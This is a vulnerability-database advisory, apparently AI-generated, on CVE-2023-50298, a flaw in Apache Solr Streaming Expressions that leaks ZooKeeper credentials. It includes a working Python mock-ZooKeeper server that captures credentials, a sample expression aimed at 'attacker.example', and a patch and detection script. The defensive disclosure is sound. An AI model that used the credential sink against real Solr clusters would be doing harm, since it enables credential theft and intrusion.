
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2023-50298 is an Exposure of Sensitive Information vulnerability in Apache Solr affecting versions 6.0.0 through 8.11.2 and 9.0.0 before 9.4.1. It was publicly disclosed on February 8, 2024. The flaw is in Solr's Streaming Expressions feature, which lets a user pull data from another SolrCloud cluster by naming that cluster's ZooKeeper ensemble in a 'zkHost' parameter (Apache Security, NVD).
The root cause is how Streaming Expressions handle ZooKeeper credentials and ACLs. When the local SolrCloud is configured with ZooKeeper credentials (for example a digest username and password) and ACLs, Solr attaches those same credentials to whatever 'zkHost' the user supplies in the expression, even when that host is not the cluster's own ensemble. Streaming Expressions are reached through the '/stream' request handler (the Apache advisory refers to it as '/streaming'), which is protected only by Solr's 'read' permission, so no write or admin rights are needed to trigger the issue. NVD rates the severity HIGH with a CVSS v3.1 base score of 7.5 (vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N): network reachable, low attack complexity, no privileges or user interaction required, high confidentiality impact, no integrity or availability impact (NVD).
Exploitation is straightforward. The attacker stands up a server that speaks just enough of the ZooKeeper wire protocol to accept a client connection and the authentication packets that follow it, then submits a streaming expression whose 'zkHost' points at that server. The target Solr node connects to the attacker's host and sends its ZooKeeper credentials and ACL information as part of establishing the session, and the mock server simply records them (Apache Security).
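The credential sink described above, written out as an added example for this page (it is not Apache code or a published exploit). It decodes the frames a ZooKeeper client sends using ZooKeeper's Jute wire encoding: a 4-byte big-endian length prefix, then the record fields, with a ConnectRequest first and an AuthPacket (RequestHeader type 100, xid -4) for each credential the client was given. The sample traffic is constructed inline from the encoder helpers so the decoder can be exercised offline; the listener at the bottom assumes the client transmits its AuthPacket frames immediately after the ConnectRequest without waiting for a reply, so it never answers. A client that does wait would need a ConnectResponse first, which this example deliberately omits.

```python
"""Mock-ZooKeeper credential sink: decode what a ZooKeeper client sends and
pull out any AuthPacket it carries. Added example, not Apache code."""
import socket
import struct

OP_AUTH = 100   # ZooKeeper OpCode.auth: RequestHeader.type of an AuthPacket
AUTH_XID = -4   # xid the Java client uses for AuthPacket frames


class JuteReader:
    """Sequential decoder for the Jute primitives used in these records."""

    def __init__(self, data: bytes):
        self.data, self.pos = data, 0

    def int32(self) -> int:
        (v,) = struct.unpack_from(">i", self.data, self.pos)
        self.pos += 4
        return v

    def int64(self) -> int:
        (v,) = struct.unpack_from(">q", self.data, self.pos)
        self.pos += 8
        return v

    def buffer(self):
        n = self.int32()                       # -1 encodes a null buffer
        if n < 0:
            return None
        v = bytes(self.data[self.pos:self.pos + n])
        self.pos += n
        return v

    def ustring(self):
        b = self.buffer()
        return None if b is None else b.decode("utf-8")


def jute_buffer(b: bytes) -> bytes:
    return struct.pack(">i", len(b)) + b


def frame(body: bytes) -> bytes:
    """Length-prefix one record the way it travels on the wire."""
    return struct.pack(">i", len(body)) + body


def split_frames(stream: bytes):
    """Split a byte stream into complete frames; a trailing partial frame is dropped."""
    frames, pos = [], 0
    while pos + 4 <= len(stream):
        (n,) = struct.unpack_from(">i", stream, pos)
        if n < 0 or pos + 4 + n > len(stream):
            break
        frames.append(stream[pos + 4:pos + 4 + n])
        pos += 4 + n
    return frames


# Client-side encoders, used here only to build constructed sample traffic.
def connect_request(timeout_ms=30000, session_id=0, passwd=b"\x00" * 16) -> bytes:
    # ConnectRequest: protocolVersion, lastZxidSeen, timeOut, sessionId, passwd, readOnly
    body = struct.pack(">iqiq", 0, 0, timeout_ms, session_id) + jute_buffer(passwd) + b"\x00"
    return frame(body)


def auth_packet(scheme: str, auth: bytes) -> bytes:
    # RequestHeader(xid, type) followed by AuthPacket(type, scheme, auth)
    header = struct.pack(">ii", AUTH_XID, OP_AUTH)
    return frame(header + struct.pack(">i", 0) + jute_buffer(scheme.encode()) + jute_buffer(auth))


def extract_credentials(stream: bytes) -> dict:
    """Decode the first frame as a ConnectRequest and collect every AuthPacket after it."""
    frames = split_frames(stream)
    if not frames:
        return {"connect": None, "auth": []}
    r = JuteReader(frames[0])
    connect = {"protocol_version": r.int32(), "last_zxid": r.int64(),
               "timeout_ms": r.int32(), "session_id": r.int64(), "passwd": r.buffer()}
    captured = []
    for body in frames[1:]:
        r = JuteReader(body)
        xid, op = r.int32(), r.int32()
        if op != OP_AUTH:
            continue                           # ping, getData, etc. carry no credentials
        r.int32()                              # AuthPacket.type, always 0
        scheme, data = r.ustring(), r.buffer()
        captured.append({"xid": xid, "scheme": scheme, "auth": data.decode("utf-8", "replace")})
    return {"connect": connect, "auth": captured}


def mock_server_capture(host="127.0.0.1", port=2181, idle_timeout=5.0):
    """Accept one connection, read until the peer goes quiet, decode what it sent.
    Never replies (assumption: the client sends its auth frames unprompted)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))
        srv.listen(1)
        conn, peer = srv.accept()
        with conn:
            conn.settimeout(idle_timeout)
            buf = b""
            try:
                while chunk := conn.recv(65536):
                    buf += chunk
            except socket.timeout:
                pass
    return peer, extract_credentials(buf)
```

Running mock_server_capture() on a host the attacker controls and then submitting an expression such as search(collection, zkHost="that-host:2181", q="*:*", ...) to the target's /stream handler is the whole attack; the interesting return value is the "auth" list, which for a digest-authenticated cluster contains the scheme and the user:password string. The decoder is the part worth keeping for defenders too: the same function over a packet capture of outbound port-2181 traffic shows exactly which credentials left the node.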
Users are recommended to upgrade to Apache Solr 8.11.3 or 9.4.1, which fix the issue. From those versions on, Solr only sends the configured ZooKeeper credentials and ACLs to a 'zkHost' whose server address matches the cluster's own ZooKeeper ensemble; the chroot path is ignored in that comparison, so a zkHost naming the same servers under a different chroot still authenticates, while any other server address is connected to without credentials (Apache Security).
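The gate the fixed versions apply, and a matching log-side check, as an added illustration for this page rather than Solr's own implementation. The function names are hypothetical. The advisory only says "same server address, regardless of chroot", so the comparison rule here (server list compared as a set after lowercasing, chroot stripped, exact equality required) is this example's reading of that sentence, not a description of Solr's code. The pre-fix behaviour is included beside it so the difference is visible.

```python
"""Credential gate for user-supplied zkHost values, plus a detector that
flags streaming expressions naming a foreign ensemble. Added example with
hypothetical function names; not Solr's code."""
import re


def parse_zkhost(zkhost: str):
    """Split 'h1:2181,h2:2181/chroot' into (frozenset of server addresses, chroot)."""
    servers, sep, chroot = zkhost.partition("/")
    hosts = frozenset(h.strip().lower() for h in servers.split(",") if h.strip())
    return hosts, ("/" + chroot if sep else "")


def vulnerable_credentials_for(configured_zkhost: str, requested_zkhost: str, creds):
    """Pre-fix behaviour (6.0.0-8.11.2, 9.0.0-9.4.0): any zkHost gets the credentials."""
    return creds


def credentials_for(configured_zkhost: str, requested_zkhost: str, creds):
    """Fixed behaviour: same server address (chroot ignored) or no credentials at all.
    Assumption: set equality is required, so a subset of the ensemble is not enough."""
    own_hosts, _ = parse_zkhost(configured_zkhost)
    req_hosts, _ = parse_zkhost(requested_zkhost)
    return creds if req_hosts and req_hosts == own_hosts else None


# Matches the quoted form used in streaming expressions, e.g. zkHost="h:2181/solr".
_ZKHOST_RE = re.compile(r'zkHost\s*=\s*"([^"]*)"')


def foreign_zkhosts(expression: str, configured_zkhost: str):
    """Return every zkHost in a streaming expression that is not the node's own ensemble.
    Useful over request logs of unpatched nodes to spot exfiltration attempts."""
    return [z for z in _ZKHOST_RE.findall(expression)
            if credentials_for(configured_zkhost, z, True) is None]


if __name__ == "__main__":
    creds = ("digest", "solr:s3cret")              # constructed sample credentials
    own = "zk1:2181,zk2:2181/solr"
    expr = 'search(products, zkHost="attacker.example:2181/solr", q="*:*", fl="id", sort="id asc")'
    print("vulnerable:", vulnerable_credentials_for(own, "attacker.example:2181/solr", creds))
    print("fixed:     ", credentials_for(own, "attacker.example:2181/solr", creds))
    print("same ensemble, other chroot:", credentials_for(own, "zk2:2181,zk1:2181/other", creds))
    print("flagged:", foreign_zkhosts(expr, own))
```

Because the handler is reachable with only the 'read' permission, the detector is the practical interim control on clusters that cannot upgrade immediately: run it over logged /stream expressions, and treat any flagged zkHost as a reason to rotate the ZooKeeper digest credentials, since the pre-fix code has already sent them.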
Source: This report was generated using AI